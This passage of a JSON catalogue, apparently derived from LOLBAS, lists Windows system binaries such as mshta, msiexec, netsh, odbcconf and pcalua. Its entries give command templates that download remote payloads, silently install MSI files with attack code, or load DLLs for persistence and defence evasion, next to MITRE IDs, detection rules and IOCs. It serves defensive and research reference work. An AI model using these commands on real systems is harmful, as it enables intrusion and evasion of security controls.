stream","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:4","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mshta.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:0","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /quiet /i {PATH:.msi}","description":"Installs the target .MSI file silently.","usecase":"Execute custom made msi file with attack code","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:1","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /q /i {REMOTEURL}","description":"Installs the target remote & renamed .MSI file silently.","usecase":"Execute custom made msi file with attack code from remote server","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:2","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /y {PATH_ABSOLUTE:.dll}","description":"Calls DllRegisterServer to register the target DLL.","usecase":"Execute dll files","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:3","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /z {PATH_ABSOLUTE:.dll}","description":"Calls DllUnregisterServer to un-register the target DLL.","usecase":"Execute dll files","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msiexec-exe:4","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb","description":"Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.","usecase":"Install trusted and signed msi file, with additional attack code as transformation file, from a remote server","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msoxmled-exe:0","toolId":"lolbas:msoxmled-exe","toolName":"msoxmled.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msoxmled.exe /verb open {REMOTEURL}","description":"Downloads payload from remote server using the Microsoft Office XML Editor.","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\msoxmled.exe","C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\msoxmled.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`msoxmled.exe` making network connections to external URLs"},{"type":"IOC","value":"Unexpected file downloads initiated by `msoxmled.exe`"},{"type":"IOC","value":"Event ID 1 with Image: `msoxmled.exe` and CommandLine: `/verb open`"}],"references":["https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013","https://lolbas-project.github.io/lolbas/Binaries/msoxmled/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:netsh-exe:0","toolId":"lolbas:netsh-exe","toolName":"Netsh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"netsh.exe add helper {PATH_ABSOLUTE:.dll}","description":"Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called","usecase":"Proxy execution of .dll","mitre":["T1546.007"],"privilege":"admin","fullPath":["C:\\WINDOWS\\System32\\Netsh.exe","C:\\WINDOWS\\SysWOW64\\Netsh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml"},{"type":"IOC","value":"Netsh initiating a network connection"}],"references":["https://freddiebarrsmith.com/trix/trix.html","https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html","https://liberty-shell.com/sec/2018/07/28/netshlep/","https://lolbas-project.github.io/lolbas/Binaries/Netsh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ngen-exe:0","toolId":"lolbas:ngen-exe","toolName":"Ngen.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ngen.exe {REMOTEURL}","description":"Downloads payload from remote server using the Microsoft Native Image Generator utility.","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"],"toolType":"Binary","references":["https://lolbas-project.github.io/lolbas/Binaries/Ngen/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:odbcconf-exe:0","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}","description":"Execute DllRegisterServer from DLL specified.","usecase":"Execute a DLL file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"user","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:odbcconf-exe:1","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf INSTALLDRIVER \"lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2\"\nodbcconf configsysdsn \"lolbas-project\" \"DSN=lolbas-project\"","description":"Install a driver and load the DLL. Requires administrator privileges.","usecase":"Execute dll file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"user","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:odbcconf-exe:2","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf -f {PATH:.rsp}","description":"Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.","usecase":"Execute dll file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:offlinescannershell-exe:0","toolId":"lolbas:offlinescannershell-exe","toolName":"OfflineScannerShell.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"OfflineScannerShell","description":"Execute mpclient.dll library in the current working directory","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml"},{"type":"IOC","value":"OfflineScannerShell.exe should not be run on a normal workstation"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:onedrivestandaloneupdater-exe:0","toolId":"lolbas:onedrivestandaloneupdater-exe","toolName":"OneDriveStandaloneUpdater.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"OneDriveStandaloneUpdater","description":"Download a file from the web address specified in `HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\\OneDrive\\StandaloneUpdater\\PreSignInSettingsConfig.json`.","usecase":"Download a file from the Internet without executing any anomalous executables with suspicious arguments","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files (x86)\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL"},{"type":"IOC","value":"Reports of downloading from suspicious URLs in %localappdata%\\OneDrive\\setup\\logs\\StandaloneUpdate_*.log files"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml"}],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/153","https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcalua-exe:0","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH:.exe}","description":"Open the target .EXE using the Program Compatibility Assistant.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcalua-exe:1","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH_SMB:.dll}","description":"Open the target .DLL file with the Program Compatibilty Assistant.","usecase":"Proxy execution of remote dll file","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcalua-exe:2","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java","description":"Open the target .CPL file with the Program Compatibility Assistant.","usecase":"Execution of CPL 